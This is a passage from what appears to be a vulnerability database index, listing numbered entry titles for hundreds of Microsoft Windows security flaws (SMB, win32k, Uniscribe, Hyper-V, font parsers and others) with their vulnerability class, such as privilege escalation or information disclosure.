to XP SP3 SMB privilege escalation [101042] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101041] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101040] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101039] Microsoft Windows up to XP SP3 SMB privilege escalation [101038] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101037] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101036] Microsoft Windows up to XP SP3 SMBv1 Server privilege escalation [101035] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101034] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [101026] Microsoft Windows DNS Server privilege escalation [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [101002] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101001] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101000] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100999] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100918] Microsoft Windows 8/8.1/10/Server 2012/Server 2016 Malware Protection Service memory corruption [100854] Microsoft Windows Server 2003 SP2 RRAS ERRATICGOPHER memory corruption [99904] Microsoft Windows Server 2003 SP2/XP SP3 SmartCard Authentication EsteemAudit privilege escalation [99696] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver ATMFD.dll information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99681] Microsoft Windows up to Server 2016 OLE Integrity-Level Check privilege escalation [99680] Microsoft Windows up to Vista SP2 Win32k privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98113] Microsoft Windows up to Vista SP2 XML Core Services information disclosure [98112] Microsoft Windows up to Vista SP2 DirectShow information disclosure [98111] Microsoft Windows 7 SP1/Vista SP2 DVD Maker cross site request forgery [98110] Microsoft Windows Active Directory Federation Services information disclosure [98069] Microsoft Windows up to Server 2012 R2 Color Management privilege escalation [98068] Microsoft Windows up to Vista SP2 Graphics Component USP10!otlList::insertAt memory corruption [98067] Microsoft Windows up to Vista SP2 Color Management information disclosure [98066] Microsoft Windows Color Management information disclosure [98065] Microsoft Windows up to Vista SP2 GDI+ information disclosure [98058] Microsoft Windows iSNS Server memory corruption [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [98055] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [98054] Microsoft Windows up to Server 2016 SMBv2/SMBv3 denial of service [98052] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98051] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98050] Microsoft Windows up to Vista SP2 Uniscribe Read/Write memory corruption [98049] Microsoft Windows Uniscribe information disclosure [98048] Microsoft Windows Uniscribe information disclosure [98047] Microsoft Windows Uniscribe information disclosure [98046] Microsoft Windows Uniscribe information disclosure [98045] Microsoft Windows Uniscribe information disclosure [98044] Microsoft Windows Uniscribe information disclosure [98043] Microsoft Windows Uniscribe information disclosure [98042] Microsoft Windows Uniscribe information disclosure [98041] Microsoft Windows Uniscribe information disclosure [98040] Microsoft Windows Uniscribe information disclosure [98039] Microsoft Windows Uniscribe information disclosure [98038] Microsoft Windows Uniscribe information disclosure [98037] Microsoft Windows Uniscribe information disclosure [98036] Microsoft Windows Uniscribe information disclosure [98035] Microsoft Windows Uniscribe information disclosure [98034] Microsoft Windows Uniscribe information disclosure [98033] Microsoft Windows Uniscribe information disclosure [98032] Microsoft Windows Uniscribe information disclosure [98031] Microsoft Windows Uniscribe rule information disclosure [98030] Microsoft Windows Uniscribe memory corruption [98029] Microsoft Windows Uniscribe memory corruption [98028] Microsoft Windows Uniscribe memory corruption [98027] Microsoft Windows Uniscribe memory corruption [98026] Microsoft Windows Uniscribe memory corruption [98025] Microsoft Windows Uniscribe memory corruption [98024] Microsoft Windows Uniscribe Data Processing Error [98023] Microsoft Windows up to Vista SP2 SMB privilege escalation [98022] Microsoft Windows up to XP SP3 SMB information disclosure [98021] Microsoft Windows up to XP SP3 SMB privilege escalation [98020] Microsoft Windows up to XP SP3 SMB privilege escalation [98019] Microsoft Windows up to XP SP3 SMB privilege escalation [98018] Microsoft Windows up to XP SP3 SMB privilege escalation [98017] Microsoft Windows up to Server 2016 PDF memory corruption [98016] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98014] Microsoft Windows up to Vista SP2 Hyper-V information disclosure [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98012] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98011] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98010] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98009] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [96521] Microsoft Windows 8.1/10/Server 2012/Server 2016 SMB Response mrxsmb20.sys denial of service [95126] Microsoft Windows Local Security Authority Subsystem Service privilege escalation [94457] Microsoft Windows up to Vista SP2 Win32k privilege escalation [94456] Microsoft Windows up to Vista SP2 PFB Font win32k.sys Data Processing Error [94437] Microsoft Windows up to Vista SP2 Uniscribe LoadUvsTable Data Processing Error [94436] Microsoft Windows 10 Graphics Data Processing Error [94435] Microsoft Windows up to Vista SP2 Graphics Data Processing Error [94434] Microsoft Windows GDI information disclosure [93964] Microsoft Windows 7 Excel Starter 2010 XML External Entity [93963] Microsoft Windows Authorization Manager msxml3.dll File information disclosure [93962] Microsoft Windows 7 SP1 Event Viewer File information disclosure [93954] Microsoft Windows 7 SP1 NFO File MSINFO32.EXE XML External Entity [93953] Microsoft Windows Media Center 6.1.7600 MCL File ehshell.exe XML External Entity [93602] Microsoft Windows 7/10 cmd.exe privilege escalation [93419] Microsoft Windows up to Vista SP2 NTLM Password Change privilege escalation [93418] Microsoft Windows up to Vista SP2 Local Security Authority Subsystem Service privilege escalation [93390] Microsoft Windows up to Vista SP2 Open Type Font privilege escalation [93389] Microsoft Windows up to Server 2016 Media Foundation memory corruption [93388] Microsoft Windows up to Server 2016 Animation Manager Stylesheets memory corruption [93387] Microsoft Windows up to Vista SP2 Open Type Font information disclosure [93386] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control privilege escalation [93383] Microsoft Windows up to Vista SP2 Image File Upload privilege escalation [92596] Microsoft Windows 7 SP1/Server 2008 R2/Server 2008 SP2/Vista SP2 Internet Messaging API File information disclosure [92595] Microsoft Windows 10 Diagnostics Hub privilege escalation [92590] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92589] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92588] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92587] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Transaction Manager privilege escalation [92586] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92585] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control memory corruption [92583] Microsoft Windows up to Vista SP2 True Type Font privilege escalation [92582] Microsoft Windows up to Vista SP2 GDI+ privilege escalation [92581] Microsoft Windows up to Vista SP2 Graphics privilege escalation [92580] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92579] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92578] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92577] Microsoft Windows up to Vista SP2 True Type Font information disclosure [91572] Microsoft Windows up to Vista Scripting Engine memory corruption [91571] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91570] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91569] Microsoft Windows up to Vista privilege escalation [91561] Microsoft Windows up to Vista Object memory corruption [91560] Microsoft Windows 10 Object memory corruption [91559] Microsoft Windows 8.1/10/RT 8.1 NTLM SSO privilege escalation [91540] Microsoft Windows up to Vista GDI memory corruption [91539] Microsoft Windows up to Vista GDI privilege escalation [91538] Microsoft Windows up to Vista GDI 7PK Security Features [91537] Microsoft Windows win32k.sys privilege escalation [91536] Microsoft Windows up to Vista win32k.sys privilege escalation [90934] Microsoft Windows 7/8.1 FON Font File win32k.sys denial of service [90713] Microsoft Windows up to Vista SP2 NetBIOS privilege escalation [90712] Microsoft Windows 10/10 1511 Universal Outlook information disclosure [90711] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF privilege escalation [90710] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 Netlogon privilege escalation [90709] Microsoft Windows up to Vista SP2 Kerberos privilege escalation [90702] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90701] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90700] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90699] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90698] Microsoft Windows Graphics privilege escalation [90697] Microsoft Windows Graphics privilege escalation [90696] Microsoft Windows up to Vista SP2 Graphics privilege escalation [90252] Microsoft Windows TCP/IP NetBios Helper Service information disclosure [89605] Microsoft Windows NT 4.0/2000 Security Event Log denial of service [89604] Microsoft Windows NT 4.0/2000 Application Event Log denial of service [89571] Microsoft Windows IMAPI CD Burning COM privilege escalation [89570] Microsoft Windows Netmeeting Remote Desktop Sharing privilege escalation [89520] Microsoft Windows Terminal Services information disclosure [89505] Microsoft Windows FTP Server privilege escalation [89504] Microsoft Windows System Event Log privilege escalation [89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication [89431] Microsoft Windows FAT32 Partition Driver information disclosure [89417] Microsoft Windows RAS Connection weak encryption [89413] Microsoft Windows Default Share privilege escalation [89411] Microsoft Windows LanMan Hash weak authentication [89389] Microsoft Windows Auto Update information disclosure [89345] Microsoft Windows NetBIOS Shared Folder information disclosure [89344] Microsoft Windows NetBIOS/SMB Authentication information disclosure [89342] Microsoft Windows 95/98 LanMan Hash weak encryption [89340] Microsoft Windows 95/98 SMB Service memory corruption [89337] Microsoft Windows FTP Service denial of service [89335] Microsoft Windows NetBIOS/CIFS weak encryption [89303] Microsoft Windows Admin Account weak authentication [89299] Microsoft Windows LanMan Authentication weak authentication [89297] Microsoft Windows Startup Malware privilege escalation [89295] Microsoft Windows Services information disclosure [89294] Microsoft Windows Guest Account information disclosure [89293] Microsoft Windows Guest Account unknown vulnerability [89292] Microsoft Windows Guest Account Log information disclosure [89290] Microsoft Windows Security Log denial of service [89288] Microsoft Windows Winlogon privilege escalation [89259] Microsoft Windows Patch MS04-002 privilege escalation [89150] Microsoft Windows RAS weak encryption [89051] Microsoft Windows up to Vista SP2 .NET Framework information disclosure [89036] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver privilege escalation [89035] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver 7PK Security Features [89034] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [88883] Microsoft Windows VeriSign weak authentication [88787] Microsoft Windows NT 4.0 RAS via PPP denial of service [88786] Microsoft Windows NT 4.0 NetBIOS Over TCP privilege escalation [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88775] Microsoft Windows XP Digitally Sign weak authentication [88774] Microsoft Windows XP Digitally Sign weak authentication [88773] Microsoft Windows XP Digitally Sign weak authentication [88772] Microsoft Windows XP Session Key weak authentication [88765] Microsoft Windows 2000/2000 SP1/2000 SP2 Service Pack 3 privilege escalation [88763] Microsoft Windows Remote Data Services information disclosure [88706] Microsoft Windows up to NT 3.51 SP4/4.0 SP5 RRAS denial of service [88686] Microsoft Windows Locator Service information disclosure [88675] Microsoft Windows information disclosure [88670] Microsoft Windows Password Filter privilege escalation [88664] Microsoft Windows NT 4.0 TCP/IP Security privilege escalation [88658] Microsoft Windows NT 4.0 Device Driver privilege escalation [88657] Microsoft Windows NT 4.0/2000 DHCP Server information disclosure [88655] Microsoft Windows 2000 DNS Server privilege escalation [88649] Microsoft Windows information disclosure [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [88630] Microsoft Windows Registry Permission privilege escalation [88598] Microsoft Windows NT 4.0/2000 privilege escalation [88438] Microsoft Windows 95/98 ICMP denial of service [88319] Microsoft Windows NT 4.0 File Protection privilege escalation [88316] Microsoft Windows privilege escalation [88313] Microsoft Windows W32/Deloder Worm privilege escalation [88311] Microsoft Windows UPnP TCP Helper information disclosure [88285] Microsoft Windows CIS information disclosure [88283] Microsoft Windows Terminal Services/Citrix Server weak authentication [88281] Microsoft Windows SvcOpenSCManager information disclosure [88276] Microsoft Windows shlwapi.dll denial of service [88269] Microsoft Windows Registry Password information disclosure [88268] Microsoft Windows information disclosure [88266] Microsoft Windows information disclosure [88265] Microsoft Windows information disclosure [88264] Microsoft Windows User information disclosure [88253] Microsoft Windows SMB Server privilege escalation [88251] Microsoft Windows Guest Account privilege escalation [88240] Microsoft Windows NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 SNMP GET unknown vulnerability [88236] Microsoft Windows NT 4.0/2000/Server 2003/XP SNMP WINS privilege escalation [88210] Microsoft Windows Secure Site weak encryption [88199] Microsoft Windows NT 4.0 Ssping teardrop2 Patch denial of service [88198] Microsoft Windows DNS Server privilege escalation [88196] Microsoft Windows Force Shutdown from a Remote System Privilege privilege escalation [88195] Microsoft Windows Modify Firmware Environment Values Privilege privilege escalation [88194] Microsoft Windows Debug Programs Privilege privilege escalation [88193] Microsoft Windows Restore Files/Directories Privilege privilege escalation [88192] Microsoft Windows Backup Files/Directories Privilege privilege escalation [88191] Microsoft Windows Create a Pagefile Privilege privilege escalation [88190] Microsoft Windows Increase Scheduling Priority Privilege privilege escalation [88188] Microsoft Windows Profile Single Process Privilege privilege escalation [88187] Microsoft Windows Change the System Time Privilege privilege escalation [88186] Microsoft Windows Create Permanent Shared Objects Privilege privilege escalation [88185] Microsoft Windows Profile System Performance Privilege privilege escalation [88184] Microsoft Windows Act as Part of the Operating System Privilege privilege escalation [88183] Microsoft Windows Increase Quotas Privilege privilege escalation [88182] Microsoft Windows Load/Unload Device Drivers Privilege privilege escalation [88181] Microsoft Windows Lock Pages in Memory Privilege privilege escalation [88179] Microsoft Windows Protocol information disclosure [88178] Microsoft Windows Network Interface information disclosure [88173] Microsoft Windows rsh TCP Sequence privilege escalation [88172] Microsoft Windows Service Unknown information disclosure [88171] Microsoft Windows Registry File Association privilege escalation [88159] Microsoft Windows Remote Access Service information disclosure [88157] Microsoft Windows 2000/NT Password Policy weak authentication [88155] Microsoft Windows 2000/NT/XP LAN Manager weak encryption [88154] Microsoft Windows 2000/NT Username information disclosure [88153] Microsoft Windows 2000/NT information disclosure [88152] Microsoft Windows NetBIOS privilege escalation [88151] Microsoft Windows Registry privilege escalation [88150] Microsoft Windows NT Share information disclosure [87961] Microsoft Windows up to Server 2012 R2 Search privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [87959] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87958] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF privilege escalation [87957] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87952] Microsoft Windows 10/10 1511 Diagnostic Hub Data Processing Error [87951] Microsoft Windows up to Vista SP2 WPAD Data Processing Error [87950] Microsoft Windows up to Vista SP2 WPAD privilege escalation [87949] Microsoft Windows Netlogon privilege escalation [87948] Microsoft Windows up to Vista SP2 SMB Server privilege escalation [87947] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver atmfd.dll privilege escalation [87946] Microsoft Windows 10 Kernel win32k.sys privilege escalation [87945] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87944] Microsoft Windows Server 2012/Server 2012 R2 Virtual PCI Memory information disclosure [87943] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87942] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87941] Microsoft Windows up to Vista SP2 Group Policy privilege escalation [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87935] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87934] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87933] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87167] Microsoft Windows up to Vista SP2 DirectX Graphics Kernel Subsystem privilege escalation [87166] Microsoft Windows up to Server 2012 R2 DirectX Graphics Kernel Subsystem privilege escalation [87165] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87164] Microsoft Windows up to Vista SP2 win32k.sys information disclosure [87163] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87162] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87161] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87158] Microsoft Windows Vista SP2/7 SP1/8.1 Media Center privilege escalation [87156] Microsoft Windows 8.1/10/RT 8.1/Server 2012 R2 Shell privilege escalation [87155] Microsoft Windows Vista SP2/7/8.1/RT 8.1/10 Journal privilege escalation [87154] Microsoft Windows up to Vista SP2 Imaging memory corruption [87153] Microsoft Windows up to Vista SP2 Direct3D memory corruption [87152] Microsoft Windows up to Vista SP2 Graphics Component privilege escalation [87151] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87150] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87145] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [87144] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [83151] Microsoft Windows EMF File GetEnhMetaFilePaletteEntries denial of service [82236] Microsoft Windows up to Vista SP2 OLE privilege escalation [82234] Microsoft Windows 10 HTTP.sys Data Processing Error [82231] Microsoft Windows up to Vista SP2 Font Library memory corruption [82226] Microsoft Windows up to Vista SP2 SAM/LSAD Badlock 7PK Security Features [82223] Microsoft Windows 8.1/10/Server 2012 R2 Hyper-V Memory information disclosure [82222] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Memory information disclosure [82221] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Hyper-V privilege escalation [81899] Microsoft Windows Media Services privilege escalation [81837] Microsoft Windows NT 4.0 SynAttackProtect denial of service [81815] Microsoft Windows NT 3.51/NT 4.0 Registry privilege escalation [81814] Microsoft Windows Telnet weak encryption [81813] Microsoft Windows XP weak encryption [81812] Microsoft Windows XP Network Client Feature weak authentication [81801] Microsoft Windows Logon Hours privilege escalation [81798] Microsoft Windows XP Remote Desktop information disclosure [81788] Microsoft Windows privilege escalation [81719] Microsoft Windows privilege escalation [81718] Microsoft Windows 4.0/4.0 SP1/4.0 SP2/4.0 SP3 Service Pack Patches privilege escalation [81685] Microsoft Windows Guest Account privilege escalation [81284] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [81283] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81282] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81281] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81280] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81279] Microsoft Windows up to Vista SP2 USB Mass Storage Class Driver privilege escalation [81277] Microsoft Windows privilege escalation [81276] Microsoft Windows up to Vista SP2 OLE privilege escalation [81275] Microsoft Windows up to Vista SP2 OLE privilege escalation [81271] Microsoft Windows 10 PDF Library privilege escalation [81270] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library privilege escalation [81269] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81268] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81267] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81266] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81265] Microsoft Windows Server 2008/Vista SP2 Library Loader privilege escalation [80885] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80879] Microsoft Windows Network Policy Server RADIUS privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [80877] Microsoft Windows up to Vista SP2 Forms information disclosure [80876] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [80874] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80866] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [80865] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 DLL Loader privilege escalation [80864] Microsoft Windows up to Vista DLL Loader privilege escalation [80863] Microsoft Windows up to Vista DLL Loader privilege escalation [80861] Microsoft Windows up to Vista SP2 Journal memory corruption [80860] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Reader privilege escalation [80859] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF Library memory corruption [80223] Microsoft Windows 10/1511 RDP Service 7PK Security Features [80220] Microsoft Windows up to Vista SP2 DirectShow memory corruption [80215] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure [80213] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [80212] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [79515] Microsoft Windows 10 Kernel privilege escalation [79514] Microsoft Windows up to Vista Kernel privilege escalation [79513] Microsoft Windows up to Vista Kernel privilege escalation [79512] Microsoft Windows up to Vista Kernel privilege escalation [79511] Microsoft Windows Vista/7/8/8.1 Media Center privilege escalation [79510] Microsoft Windows Vista/7/8/8.1 Media Center information disclosure [79509] Microsoft Windows up to Vista PGM race condition [79508] Microsoft Windows up to Server 2012 R2 Library Loader privilege escalation [79507] Microsoft Windows up to Vista Library Loader privilege escalation [79506] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Library Loader privilege escalation [79499] Microsoft Windows 7/Server 2008 R2 Uniscribe Numeric Error [79495] Microsoft Windows up to Vista Graphics memory corruption [79494] Microsoft Windows up to Vista Graphics memory corruption [79493] Microsoft Windows Server 2008/Vista Graphics memory corruption [79492] Microsoft Windows DNS memory corruption [79191] Microsoft Windows Journal memory corruption [79184] Microsoft Windows up to Vista TLS Schannel privilege escalation [79183] Microsoft Windows up to Server 2012 R2 IPsec denial of service [79182] Microsoft Windows up to Vista Winsock privilege escalation [79174] Microsoft Windows up to Vista Kernel 7PK Security Features [79173] Microsoft Windows up to Server 2012 R2 Graphics information disclosure [79172] Microsoft Windows up to Vista Graphics privilege escalation [79171] Microsoft Windows up to Vista Graphics privilege escalation [79170] Microsoft Windows up to Vista Kernel information disclosure [79169] Microsoft Windows up to Vista Kernel privilege escalation [79168] Microsoft Windows up to Vista Kernel 7PK Security Features [79167] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Journal memory corruption [78364] Microsoft Windows 7 SP1/Vista SP2 Shell memory corruption [78363] Microsoft Windows up to Vista SP2 Shell memory corruption [77640] Microsoft Windows Active Directory Code [77636] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77625] Microsoft Windows up to Vista SP2 Journal File Numeric Error [77622] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77621] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77620] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77616] Microsoft Windows Vista SP2/7 SP1/8/8.1 Windows Media Center privilege escalation [77613] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll privilege escalation [77042] Microsoft Windows up to Vista Filesystem privilege escalation [77041] Microsoft Windows up to Vista Registry privilege escalation [77040] Microsoft Windows up to Vista Object Manager privilege escalation [77039] Microsoft Windows up to Vista WebDAV SSL weak encryption [77038] Microsoft Windows Server 2008 SP2 UDDI Services cross site scripting [77037] Microsoft Windows Server 2012/Server 2012 R2 System Center Operations Manager cross site scripting [77035] Microsoft Windows up to Vista Server Message Block memory corruption [77034] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77033] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77032] Microsoft Windows up to Vista XML Core Services weak encryption [77031] Microsoft Windows up to Vista XML Core Services information disclosure [77030] Microsoft Windows up to Vista XML Core Services weak encryption [77029] Microsoft Windows up to Vista Shell Security Feature privilege escalation [77028] Microsoft Windows up to Vista KMD Security Feature privilege escalation [77027] Microsoft Windows up to Vista CSRSS privilege escalation [77026] Microsoft Windows up to Vista ASLR information disclosure [77025] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77024] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77023] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77022] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77021] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77020] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77019] Microsoft Windows up to Vista OpenType Font Parser Code [77018] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77017] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77016] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77015] Microsoft Windows up to Vista OpenType Font Parser Data Processing Error [76756] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll memory corruption [76493] Microsoft Windows up to Vista SP2 OLE privilege escalation [76492] Microsoft Windows up to Vista SP2 OLE privilege escalation [76461] Microsoft Windows up to Server 2012 R2 Domain-Controller Communication Credentials information disclosure [76460] Microsoft Windows 7 SP1/8/Server 2012 RDP Server Service Data Processing Error [76449] Microsoft Windows 8/8.1/Server 2008/Server 2012/Server 2012 R2 Hyper-V 7PK Security Features [76448] Microsoft Windows 8.1/Server 2012 R2 Hyper-V memory corruption [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [75782] Microsoft Windows up to Vista Common Controls memory corruption [75760] Microsoft Windows Media Player 10/11/12 DataObject Code [75335] Microsoft Windows up to Vista SP2 Service Control Manager privilege escalation [75328] Microsoft Windows up to Vista Management Console memory corruption [75327] Microsoft Windows up to Vista SP2 Schannel weak encryption [75304] Microsoft Windows up to Vista SP2 TrueType Font Parser Data Processing Error [75303] Microsoft Windows up to Vista SP2 OpenType Font Parser information disclosure [75285] Microsoft Windows up to Vista SP2 Journal privilege escalation [75284] Microsoft Windows up to Vista SP2 Journal privilege escalation [75283] Microsoft Windows up to Vista SP2 Journal privilege escalation [75282] Microsoft Windows up to Vista SP2 Journal privilege escalation [75281] Microsoft Windows up to Vista SP2 Journal privilege escalation [75280] Microsoft Windows up to Vista SP2 Journal privilege escalation [74842] Microsoft Windows 8.1/Server 2012 R2 Hyper-V privilege escalation [74840] Microsoft Windows up to Vista EMF File privilege escalation [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [74833] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 HTTP Request HTTP.sys privilege escalation [74104] Microsoft Windows up to Vista Digital Certificate weak authentication [74022] Microsoft Windows up to Vista Certificate weak authentication [73972] Microsoft Windows up to Vista SP2 PNG Parser information disclosure [73963] Microsoft Windows up to Vista SP2 Photo Decoder information disclosure [73961] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 Remote Desktop Protocol Object Management denial of service [73960] Microsoft Windows Netlogon Service User 7PK Security Features [73959] Microsoft Windows up to Vista SP2 DLL Data Processing Error [73958] Microsoft Windows up to Vista SP2 Text Services Data Processing Error [73957] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73956] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73955] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73954] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73953] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73952] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73951] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73950] Microsoft Windows up to Vista Adobe Font Driver memory corruption [73938] Microsoft Windows VBScript Scripting Engine denial of service [69258] Microsoft Windows up to Vista Secure Channel FREAK weak encryption [69161] Microsoft Windows up to Vista information disclosure [69160] Microsoft Windows up to Server 2012 Process privilege escalation [69159] Microsoft Windows up to Vista Group Policy 7PK Security Features [69154] Microsoft Windows up to Vista Group Policy weak authentication [69153] Microsoft Windows up to Vista Font Mapper win32k.sys privilege escalation [69152] Microsoft Windows up to Vista True Type Font win32k.sys privilege escalation [69151] Microsoft Windows up to Vista Kernel-Mode Driver win32k.sys memory corruption [69150] Microsoft Windows up to Vista win32k.sys privilege escalation [69149] Microsoft Windows up to Vista Cryptography Next Generation cng.sys information disclosure [69148] Microsoft Windows up to Vista Win32k.sys privilege escalation [68596] Microsoft Windows Internet Authentication Service denial of service [68593] Microsoft Windows up to Server 2012 Network Location Awareness Service privilege escalation [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [68589] Microsoft Windows up to Vista Telnet Server memory corruption [66827] Microsoft Windows Media Player 11.0.5721.5230 memory corruption [66445] Microsoft Windows 8.0/8.1 